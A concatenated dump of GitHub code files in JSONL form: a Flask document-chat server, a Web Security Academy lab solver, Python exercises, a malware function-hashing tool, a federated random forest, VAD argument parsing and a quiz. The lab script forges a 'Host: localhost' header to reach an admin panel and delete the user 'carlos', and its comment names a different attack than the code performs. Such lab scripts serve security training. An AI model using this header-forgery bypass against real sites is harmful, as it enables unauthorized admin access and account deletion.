for filepath in filepaths:\n clean_file(filepath)\n\n return (\n make_response(\n {\n \"indexName\": index_name,\n \"indexType\": \"index\",\n \"fileNames\": filenames,\n }\n ),\n 200,\n )\n\n\n@app.route(\"/query\", methods=[\"GET\"])\ndef query_from_llama_index():\n try:\n message = request.args.get(\"message\")\n index_name = request.args.get(\"indexName\")\n index_type = request.args.get(\"indexType\")\n index_file_path = Path(file_upload_path) / f\"{index_name}.json\"\n\n if not os.path.isfile(index_file_path):\n return \"Index file does not exist\", 404\n\n if index_type == \"index\":\n answer = get_answer_from_index(message, index_name)\n\n return make_response(str(answer.response)), 200\n except Exception as e:\n return \"Error: {}\".format(str(e)), 500\n\n\n@app.errorhandler(500)\ndef handle_internal_server_error(e):\n response = {\"error\": \"Internal Server Error\", \"message\": str(e)}\n return jsonify(response), 500\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Chat Files\")\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"Enable debug mode\")\n args = parser.parse_args()\n if not os.path.exists(file_upload_path):\n os.makedirs(file_upload_path)\n if os.environ.get(\"CHAT_FILES_MAX_SIZE\") is not None:\n app.config[\"MAX_CONTENT_LENGTH\"] = int(os.environ.get(\"CHAT_FILES_MAX_SIZE\"))\n app.run(port=5000, host=\"0.0.0.0\", debug=args.debug)\n","repo_name":"alexd725/ChatFiles","sub_path":"chatfiles/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8811018311","text":"# Basic password reset poisoning\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nfrom bs4 import BeautifulSoup\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_path(s, url):\n\trobots_path = '/robots.txt'\n\tprint('\\n[+] Navigating to:\\t%s' % robots_path)\n\tr = s.get(url + robots_path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tbackup_path = r.text.encode().split(b'\\n')[1].split(b' ')[1].decode()\n\tprint('\\n[+] Navigating to:\\t%s' % backup_path)\n\ndef find_admin_panel(s, url):\n\tprint('\\n[+] Trying to access to the Admin Panel...')\n\tadmin_path = url + '/admin'\n\tr = s.get(admin_path)\n\ttime.sleep(1)\n\tresponse = re.search(rb\"\\n (.*)\\n \", r.text.encode()).group(1).decode().strip()\n\tprint('[+] Server response:')\n\tprint(response)\n\ndef delete_carlos(s, url):\n\tprint('\\n[+] Trying to access to the Admin Panel as local User...')\n\tadmin_path = url + '/admin'\n\theaders = {'Host': 'localhost'}\n\tprint('[+] Using Header:\\t%s' % headers)\n\tr = s.get(admin_path, headers=headers)\n\ttime.sleep(1)\n\tdelete_path = url + '/admin/delete?username=carlos'\n\tif r.status_code == 200:\n\t\tprint('\\n[+] Trying to delete Carlos user...')\n\t\tr = s.get(delete_path, headers=headers)\n\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Basic password reset poisoning')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find a way to delete Carlos account...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tget_path(s, url)\n\t\t\tfind_admin_panel(s, url)\n\t\t\tdelete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"HostHeader/exploit-lab02.py","file_name":"exploit-lab02.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39840598667","text":"##1 kod\r\nL = [3, 5, 4] ; L = L.sort()\r\n\r\n##mamy do czynienia z redundancją poniewaz sort soruje liste w miejscu wiec powinno sie to zapisac w ten sposob\r\nL = [3, 5, 4]\r\nL.sort()\r\n\r\n\r\n##2 kod\r\nx, y = 1, 2, 3 ##proba przypiisania dwom zmiennym trzech wartosci wiec blad\r\n\r\n##3 kod\r\nX = 1, 2, 3 ; X[1] = 4 ##blad braku możliwości zmiany X powinno sie zapisac\r\nX = (1, 4, 3)\r\n\r\n\r\n##4 kod\r\nX = [1, 2, 3] ; X[3] = 4 ##proba odwolanai sie do elementu poza zakresem listy\r\n\r\n##5 kod\r\nX = \"abc\" ; X.append(\"d\") ##metoda append jest dostepna dla list a nie lancuchow znakow\r\n\r\n##6 kod\r\nL = list(map(pow, range(8))) ##brak ostatniego nawiasu zamyykajacego","repo_name":"Dawid141/Python2023","sub_path":"cw_3/cw_3.2.py","file_name":"cw_3.2.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13114001453","text":"# -*- coding: utf-8 -*-\r\n# -----------------------------------------------------------------------\r\n# malget.py\r\n#\r\n# Authors: James Brahm, Matthew Rogers, Morgan Wagner, Jeramy Lochner,\r\n# Donte Brock\r\n# -----------------------------------------------------------------------\r\n# Copyright 2015 Dynetics, Inc.\r\n#\r\n# This file is a part of Malfunction\r\n#\r\n# Malfunction is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Malfunction is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n# -----------------------------------------------------------------------\r\n\r\nimport argparse\r\nimport hashlib\r\nimport shutil\r\nimport subprocess\r\nimport ssdeep\r\nimport disassembler\r\n\r\n\r\ndef argparse_setup():\r\n \"\"\" Set up argparse arguments \r\n -o output -- output file for hashes\r\n -u unpack -- automatic unpacking\"\"\"\r\n\r\n parser = argparse.ArgumentParser(prog=\"python3 malget.py\")\r\n parser.add_argument(\"PATH\", help=\"Path to the binary or binaries\")\r\n parser.add_argument(\"-o\", \"--output\", type=str, help=\"output file for \"\r\n \"signatures\")\r\n parser.add_argument(\"-u\", \"--unpack\", action=\"store_true\",\r\n help=\"Unpacks packed executables before disassembly. \"\r\n \"Currently not implemented.\")\r\n return parser.parse_args()\r\n\r\n\r\ndef check_packed(filename, unpack):\r\n \"\"\" Linux only solution for checking if a file is unpacked\"\"\"\r\n\r\n if not shutil.which(\"grep\"):\r\n print(\"Cannot check if binary is packed\")\r\n return False\r\n\r\n package_breadcrumbs = [\"UPX\", \"aspack\", \"NSP\", \"NTKrnl\",\r\n \"PEC2\", \"PECompact2\", \"Thermida\", \"aPa2Wa\"]\r\n print(\"Determining if {0} is packed\".format(filename), end=\"...\")\r\n for packer in package_breadcrumbs:\r\n returncode = subprocess.call([\"grep\", packer, filename])\r\n if returncode == 0:\r\n print(\"That file is most likely packed by {0}\".format(packer))\r\n return True\r\n print(\"That file is likely not packed by common packers\")\r\n return False\r\n\r\n\r\ndef get_binary_hash(filename):\r\n \"\"\" Get the md5 hash of the file to put at the top of the document \"\"\"\r\n\r\n blocksize = 65536\r\n hasher = hashlib.md5()\r\n with open(filename, \"rb\") as afile:\r\n buf = afile.read(blocksize)\r\n while len(buf) > 0:\r\n hasher.update(buf)\r\n buf = afile.read(blocksize)\r\n return hasher.hexdigest()\r\n\r\n\r\ndef get_hash_tuple(functions, filename):\r\n \"\"\" Creates the binary tuple for use in Malfunction and Mallearn\r\n\r\n Results in the form: (Binary Hash, [**ssdeep hashes])\"\"\"\r\n\r\n function_hashes = []\r\n binary_hash = get_binary_hash(filename)\r\n for function in functions:\r\n function_hashes.append(ssdeep.hash(function))\r\n return (binary_hash, function_hashes)\r\n\r\n\r\ndef malget(filename, unpack):\r\n \"\"\" Callable function to run malget, which gets function\r\n signatures for malfunction\r\n\r\n filename - the name of the file to get signatures for\r\n unpack - boolean for automatic unpacking \"\"\"\r\n\r\n packed = check_packed(filename, unpack)\r\n if packed:\r\n print(\"That file is packed and may not disassemble correctly\")\r\n function_lists = disassembler.get_data(filename)\r\n functions, sizes = zip(*function_lists)\r\n # Passing the sizes up to Malfunction, since Malget won't use\r\n # them for anything if called by Mallearn\r\n return get_hash_tuple(functions, filename), sizes\r\n\r\n\r\ndef main():\r\n \"\"\" Determines the file type then outputs the binary md5 hash\r\n and the function fuzzy hashes\r\n\r\n Usage:\r\n python malget.py [FILE] \"\"\"\r\n\r\n args = argparse_setup()\r\n\r\n output_file = \"malgetOutput.txt\"\r\n if args.output:\r\n output_file = args.output\r\n binary_tuple, sizes = malget(args.PATH, args.unpack)\r\n with open(output_file, \"w\") as f:\r\n f.write(binary_tuple[0]+\"\\n\")\r\n for item in binary_tuple[1]:\r\n f.write(item + \"\\n\")\r\n print(\"Output to file {0}\".format(output_file))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Dynetics/Malfunction","sub_path":"malfunction/malget.py","file_name":"malget.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"53"} +{"seq_id":"21352610647","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n\n求出1~13的整数中1出现的次数,并算出100~1300的整数中1出现的次数?为此他特别数了一下1~13中包含1的数字有1、10、11、12、13因此共出现6次,但是对于后面问题他就没辙了。ACMer希望你们帮帮他,并把问题更加普遍化,可以很快的求出任意非负整数区间中1出现的次数。\n\nhttps://blog.csdn.net/yi_afly/article/details/52012593\n\"\"\"\n\nclass Solution:\n def NumberOf1Between1AndN_Solution(self, n):\n # write code here\n count = 0\n base = 1\n r = n\n while r > 0:\n weight = r % 10\n r //= 10\n count += r*base\n if weight == 1:\n count += (n%base) + 1\n elif weight > 1:\n count += base\n base *= 10\n\n return count\n\nif __name__ == '__main__':\n s = Solution()\n c = s.NumberOf1Between1AndN_Solution(514)\n print(c)\n \n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"11277968892","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\nclass Client:\r\n \"\"\"Classe qui gere les operations des clients dans la construction d'une random forest ferere\r\n \"\"\"\r\n\r\n def __init__(self, dataset=None) -> None:\r\n self.dataset = dataset\r\n self.forest = None\r\n self.labels = None\r\n self.test_dataset = None\r\n self.test_labels = None\r\n\r\n self.current_dataset = None\r\n self.current_labels = None\r\n \r\n self.cross_valid_dataset = None\r\n self.cross_valid_labels = None\r\n self.validation_dataset = None\r\n self.validation_labels = None\r\n\r\n def __bootstrap(self, x):\r\n \"\"\"Effectue un bootstap sur le dataset x\r\n\r\n Args:\r\n x (pd.Dataframe): le dataset utilise pour le bootstrap\r\n\r\n Returns:\r\n pd.Dataframe: Donnees selectionnees du dataset\r\n \"\"\"\r\n\r\n idx = np.random.choice(len(x) - 1, replace=True, size=len(x))\r\n return x.iloc[idx]\r\n\r\n def get_best_threshold(self, features, splits, current_tree):\r\n \"\"\"Obtient le couple feature, valeur de separation qui ameliore le plus\r\n l'indice de gini pour le dataset du client.\r\n\r\n Args:\r\n features (list): liste des features a evaluer\r\n splits (list): liste des valeurs de separation associees aux features\r\n current_tree (Node): Arbre actuellement developpe\r\n\r\n Returns:\r\n tuple: tuple contenant:\r\n str: nom de l'attribut selectionne\r\n int: nombre de donnees actuellement evalues\r\n \"\"\"\r\n\r\n # Separer les donnees en fonctions de l'arbre courant\r\n labels = self.current_labels\r\n dataset = self.current_dataset\r\n\r\n # Calcul du gini de l'ensemble actuel\r\n total_gini = Client.gini_impurity(labels)\r\n\r\n # Si rien est a separer\r\n if total_gini == 0:\r\n return \"pure\", 0\r\n if len(dataset) <= 2:\r\n return \"no-data\", 0\r\n\r\n # calcul de gini pour chaque feature\r\n ds_star = dataset[features]\r\n thresholds = pd.DataFrame([splits], columns=features)\r\n ginis = ds_star.apply(lambda col: Client.gini_gain(\r\n col, labels, thresholds, total_gini), 0).values\r\n\r\n # retourne l'attribut permetant d'avoir le meilleur \"gain de gini\", ainsi que le nombre\r\n # donnees dans le dataset courant\r\n\r\n i_best_gini = np.argmax(ginis)\r\n best_gini_feature = features[i_best_gini]\r\n n_data = len(labels)\r\n\r\n if ginis[i_best_gini] <= 0:\r\n return \"no-gain\", 0\r\n\r\n return best_gini_feature, n_data\r\n\r\n def get_leaf(self, current_tree):\r\n \"\"\"Obtient la distribution des classes pour un dataset\r\n\r\n Args:\r\n current_tree (Node): arbre actuellement evalue\r\n\r\n Returns:\r\n list: labels (cibles)\r\n \"\"\"\r\n \"\"\"Obtient la distribution des classes pour un dataset \r\n (possiblement juste la classe majoritaire si on decide d'utiliser un vote)\r\n\r\n :param current_tree: arbre actuellement evalue\r\n :type current_tree: Node\r\n \"\"\"\r\n # Separer les donnees en fonctions de l'arbre courant\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # retourner le nombre de valeurs perturbees pour chaque classe dans le dataset courant\r\n return labels\r\n\r\n def get_leaf_vote(self, current_tree):\r\n \"\"\"Obtient la classe majoritaire selon les cibles majoritaires chez les clients\r\n\r\n Args:\r\n current_tree (Node): arbre actuellement evalue\r\n\r\n Returns:\r\n tuple: tuple contenant les valeurs suivantes:\r\n label (cible) majoritaire\r\n nombre de labels au total\r\n \"\"\"\r\n\r\n # Separer les donnees en fonctions de l'arbre courant\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # retourner la cible majoritaire avec le nombre de donnees dans l'ensemble du dataset initial\r\n if len(labels) > 0:\r\n result, count = np.unique(labels, return_counts=True)\r\n\r\n return result[np.argmax(count)], len(self.labels)\r\n\r\n return \"\", 0\r\n\r\n def set_new_forest(self, random_forest):\r\n \"\"\"Modifie la randomForest du client\r\n\r\n Args:\r\n random_forest (Node): Nouvelle RandomForest\r\n \"\"\"\r\n self.forest = random_forest\r\n\r\n def get_federated_accuracy(self):\r\n \"\"\"Calcule la precision de l'arbre entraine de facon federe (self.forest)\r\n\r\n Returns:\r\n tuple: tuple contentant:\r\n float: justesse (accuracy)\r\n int: nombre de donnees dans l'ensemble de test\r\n \"\"\"\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.test_labels.copy()\r\n dataset = self.test_dataset.copy()\r\n res = self.forest.predict(dataset)\r\n\r\n accuracy = 1 - sum([int(value != labels[x])\r\n for x, value in enumerate(res)]) / len(labels)\r\n\r\n return accuracy, len(dataset)\r\n\r\n def get_local_accuracy(self):\r\n \"\"\"Calcule la precision d'un arbre entraine localement et teste localement\r\n\r\n Returns:\r\n tuple: tuple contentant:\r\n float: justesse (accuracy)\r\n int: nombre de donnees dans l'ensemble de test\r\n \"\"\"\r\n\r\n # Entrainer un modele de randomForest (scikit-learn) et retourner l'accuracy\r\n dt = RandomForestClassifier()\r\n dt.fit(self.dataset, self.labels)\r\n res = dt.predict(self.test_dataset)\r\n accuracy = 1 - sum([int(value != self.test_labels[x])\r\n for x, value in enumerate(res)]) / len(self.test_labels)\r\n return accuracy, len(self.test_dataset)\r\n\r\n def get_local_model(self):\r\n \"\"\"Retourne un model entraine localement\r\n\r\n Returns:\r\n RandomForestClassifier: Model scikit-learn entraine localement\r\n \"\"\"\r\n dt = RandomForestClassifier()\r\n dt.fit(self.dataset, self.labels)\r\n return dt\r\n\r\n def get_thresholds(self, features, current_tree):\r\n \"\"\"Pour chaque features, recupere le min et le max, puis definit le threshold qui\r\n est un valeur entre le min et le max\r\n\r\n Args:\r\n features (list): Liste des features selectionnes par le master\r\n current_tree (Node): Arbre actuel (pour la separation des donnees)\r\n\r\n Returns:\r\n list: Array contenant une separation pour chaque feature\r\n \"\"\"\r\n \r\n # Calcul du dataset courant, en parcourant l'arbre jusqu'au noeud a developper\r\n if self.cross_valid_dataset is not None:\r\n labels = self.cross_valid_labels.copy()\r\n dataset = self.cross_valid_dataset.copy()\r\n else:\r\n labels = self.labels.copy()\r\n dataset = self.dataset.copy()\r\n \r\n if current_tree is not None:\r\n dataset, labels = current_tree.get_current_node_data(\r\n dataset, labels)\r\n\r\n # Afin d'eviter de recalculer pour get_best_threshold\r\n self.current_dataset = dataset\r\n self.current_labels = labels\r\n\r\n values = []\r\n for f in features:\r\n col = dataset[f]\r\n minimum = col.min()\r\n maximum = col.max()\r\n \r\n # S'il n'y a pas de donnees\r\n if np.isnan(minimum) or np.isnan(maximum):\r\n values.append(np.nan)\r\n else:\r\n values.append(np.random.default_rng().uniform(\r\n low=minimum, high=maximum))\r\n\r\n return values\r\n\r\n def get_features(self):\r\n \"\"\"Recupere les features (colonnes) du dataset du client sous forme de liste\r\n\r\n Returns:\r\n list: Liste des features du client\r\n \"\"\"\r\n\r\n return list(self.dataset.columns)\r\n\r\n def set_dataset(self, dataset, labels):\r\n \"\"\"Mise a jour du dataset (et des labels) du client\r\n\r\n Args:\r\n dataset (pd.DataFrame): dataset a modifier\r\n labels (list): liste des labels a modifier\r\n \"\"\"\r\n \"\"\"\r\n Mise a jour du dataset (et des labels) du client\r\n\r\n :param dataset: dataset a modifier\r\n :param labels: liste des labels a modifier\r\n \"\"\"\r\n dataset = dataset.reset_index(drop=True)\r\n self.labels = labels\r\n\r\n labels = pd.DataFrame(labels).reset_index(drop=True)\r\n \r\n # Selectionne les indexes qui seront dans l'ensemble d'entrainement\r\n train_idx = np.random.choice(\r\n len(dataset) - 1, replace=False, size=int(len(dataset) * 0.8))\r\n\r\n self.test_dataset = dataset.loc[~dataset.index.isin(\r\n train_idx)].copy()\r\n self.test_labels = labels.loc[~labels.index.isin(\r\n train_idx)].values.T[0]\r\n\r\n self.dataset = dataset.loc[train_idx].copy()\r\n self.labels = labels.loc[train_idx].values.T[0]\r\n \r\n def set_validation(self):\r\n dataset = self.dataset.reset_index(drop=True)\r\n labels = pd.DataFrame(self.labels).reset_index(drop=True)\r\n \r\n \r\n train_idx = np.random.choice(\r\n len(dataset) - 1, replace=False, size=int(len(dataset) * 0.8))\r\n\r\n # Definit l'ensemble de test et les cibles des 20% restants\r\n # (les donnees qui ne font pas partie de l'ensemble d'entrainement)\r\n self.validation_dataset = dataset.loc[~dataset.index.isin(train_idx)]\r\n self.cross_valid_labels = labels.loc[~labels.index.isin(train_idx)].values.T[0]\r\n\r\n self.cross_valid_dataset = dataset.loc[train_idx]\r\n self.cross_valid_labels = labels.loc[train_idx].values.T[0]\r\n return \r\n \r\n def unset_validation(self):\r\n self.validation_dataset = None\r\n self.cross_valid_labels = None\r\n\r\n self.cross_valid_dataset = None\r\n self.cross_valid_labels = None\r\n return\r\n\r\n @staticmethod\r\n def gini_impurity(labels):\r\n \"\"\"Calcul l'impureté de Gini\r\n\r\n Args:\r\n labels (list): Liste des différents labels\r\n\r\n Returns:\r\n float: L'impureté de Gini (entre 0 et 1)\r\n \"\"\"\r\n # Corrado Gini :) \r\n l, count = np.unique(labels, return_counts=True)\r\n prob = count / len(labels)\r\n return 1 - np.sum(np.power(prob, 2))\r\n\r\n @staticmethod\r\n def gini_gain(col, labels, thresholds, total_gini):\r\n \"\"\"Calcule la difference entre le gini de l'ensemble total et celui des ensembles separe\r\n\r\n Args:\r\n col (str): Nom de la colonne associé au seuil (threshold)\r\n labels (list): Liste des differents labels\r\n thresholds (float): Seuil de séparation du noeud de l'arbre associe a une colonne\r\n total_gini (float): Gain de Gini total du noeud courant avant la separation en 2 noeuds enfants\r\n\r\n Returns:\r\n float: Le gain de Gini\r\n \"\"\"\r\n\r\n threshold = thresholds[col.name][0]\r\n i_l = np.where(col <= threshold)[0]\r\n i_r = np.where(col > threshold)[0]\r\n\r\n l_gini = Client.gini_impurity(labels[i_l])\r\n r_gini = Client.gini_impurity(labels[i_r])\r\n sum_gini = total_gini - (len(i_l) / len(labels)) * l_gini - (len(i_r) / len(labels)) * r_gini\r\n\r\n return sum_gini\r\n","repo_name":"vincentlatourelle/apprentissage-distribue","sub_path":"RandomForest/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12221,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14054667595","text":"import argparse\nimport errno\nimport os\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n Segment one or multiple audio files into `.csv` files,\n which list all the detected speech segments as [START, END].\n \"\"\"\n )\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\n \"-w\",\n \"--wavfile\",\n type=file_path,\n help=\"\"\"\n Path to an audio file, e.g. `path/to/my/audiofile.wav`.\n \"\"\",\n )\n group.add_argument(\n \"-f\",\n \"--wavfolder\",\n type=dir_path,\n help=\"\"\"\n Path to a folder containing multiple wav files,\n e.g. `path/to/folder/of/wav/files`.\n \"\"\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_path\",\n nargs=\"?\",\n const=os.path.join(os.getcwd(), \"segments\"),\n default=os.path.join(os.getcwd(), \"segments\"),\n type=output_dir_path,\n help=\"\"\"\n Path of the folder to save predictions.\n By default it will be make a `segments` folder in\n the root directory and save the segments there.\n These will contain .csv files demarking\n the [START, END] of the detected speech segments.\n \"\"\",\n )\n parser.add_argument(\n \"-sr\",\n \"--sameplerate\",\n default=\"None\",\n type=str,\n help=\"\"\"\n The desired sampling frequency of the audio files.\n By default `None` is used as value to keep native sampling rate.\n \"\"\",\n )\n parser.add_argument(\n \"-e\",\n \"--audio-extensions\",\n nargs=\"+\",\n default=[\"wav\"],\n help=\"\"\"\n The type of audio files to look for a given directory,\n e.g. 'aac', 'au', 'flac', 'm4a', 'mp3', 'ogg', 'wav'.\n Default is just 'wav'.\n \"\"\",\n )\n parser.add_argument(\n \"-smf\",\n \"--smoothing-merge-factor\",\n default=5,\n type=int,\n help=\"\"\"\n The window size ratio factor used for smoothing the final\n decision boundary by merging close proximity segments.\n Default is `5`, giving window size of `sr/5`.\n \"\"\",\n )\n parser.add_argument(\n \"-sof\",\n \"--smoothing-outlier-factor\",\n default=10,\n type=int,\n help=\"\"\"\n The window size ratio factor used for smoothing the final decision\n boundary by removing small duration outlier segments.\n Default is `10`, giving a window size of `sr/10`.\n \"\"\",\n )\n parser.add_argument(\n \"-t\",\n \"--theta-scale\",\n default=1.0,\n type=float,\n help=\"\"\"\n The factor used to scale the final threshold `theta`.\n Useful to strongly differentiate final decision surface with the threshold.\n Default is `1.0`.\n \"\"\",\n )\n parser.add_argument(\n \"-ent\",\n \"--spectral-entropy\",\n default=False,\n type=bool,\n help=\"\"\"\n Weighs the ZFF evidences with the spectral entropy of the given audio\n signal to further highlight speech regions.\n Useful in noisy conditions. Default is `False`.\n \"\"\",\n )\n args = parser.parse_args()\n return args\n\n\ndef dir_path(path):\n if os.path.isdir(path):\n return path\n elif path is None:\n print(\n \"\"\"\n Please provide an input directory containing\n audio files or else a single audio file.\n \"\"\"\n )\n else:\n print(f\"The directory {path} does not exist!\")\n raise NotADirectoryError(path)\n\n\ndef file_path(path):\n if os.path.isfile(path):\n return path\n else:\n print(f\"The file {path} does not exist!\")\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n\n\ndef output_dir_path(path):\n if path == os.path.join(os.getcwd(), \"segments\"):\n if not os.path.isdir(path):\n os.makedirs(path)\n return path\n else:\n return path\n else:\n if os.path.isdir(path):\n return path\n else:\n print(f\"The directory {path} does not exist!\")\n raise NotADirectoryError(path)\n","repo_name":"idiap/zff_vad","sub_path":"zff/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"17948630955","text":"from time import sleep\nimport os\nimport sys\nimport gspread\nfrom google.oauth2.service_account import Credentials\nfrom quiz import quiz_data\n\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('avengers_quiz')\nsales = SHEET.worksheet('leaderboard')\n\nuser_name = \"\"\n\nscore = 0\n\n\ndef clear_terminal():\n \"\"\"\n Pauses the terminal for 2 seconds and clears the terminal\n \"\"\"\n sleep(2)\n\n os.system('clear')\n\n\ndef validate_user_name(user_name):\n \"\"\"\n Validates user_name input to see if it matches the criteria.\n \"\"\"\n if user_name == \"\":\n print(\"Please don't enter an empty value!\\n\")\n elif len(user_name) > 12:\n print(\"Name shouldn’t be more than 12 chartectors long!\\n\")\n elif len(user_name) < 3:\n print(\"Name shouldn’t be less than 3 chartectors!\\n\")\n else:\n return True\n\n\ndef display_question(index, question, options):\n \"\"\"\n Print questions and loop through options array and print each value\n \"\"\"\n\n print(f\"Question {index}/10 \\n\")\n\n print(question + \"\\n\")\n\n for option in options:\n print(option)\n\n print(\"Please enter your answer (a, b, c, or d):\")\n\n\ndef check_answer(answer, question_answer):\n \"\"\"\n Checks the answers to the questions if both values are equal.\n One point will be added to the score, if the answer is correct.\n If the answer is wrong no points will be added.\n \"\"\"\n global score\n\n if answer.lower() == question_answer.lower():\n print(\"Correct answer!\\n\")\n\n score += 1\n else:\n print(\"Incorrect answer!\\n\")\n\n\ndef sort_by_score(elem):\n \"\"\"\n Sort the leaderboard list by the score value\n and returns the value into integer.\n \"\"\"\n return int(elem[1])\n\n\ndef quiz_information():\n \"\"\"\n Print the Avengers logo and information about the quiz.\n \"\"\"\n\n 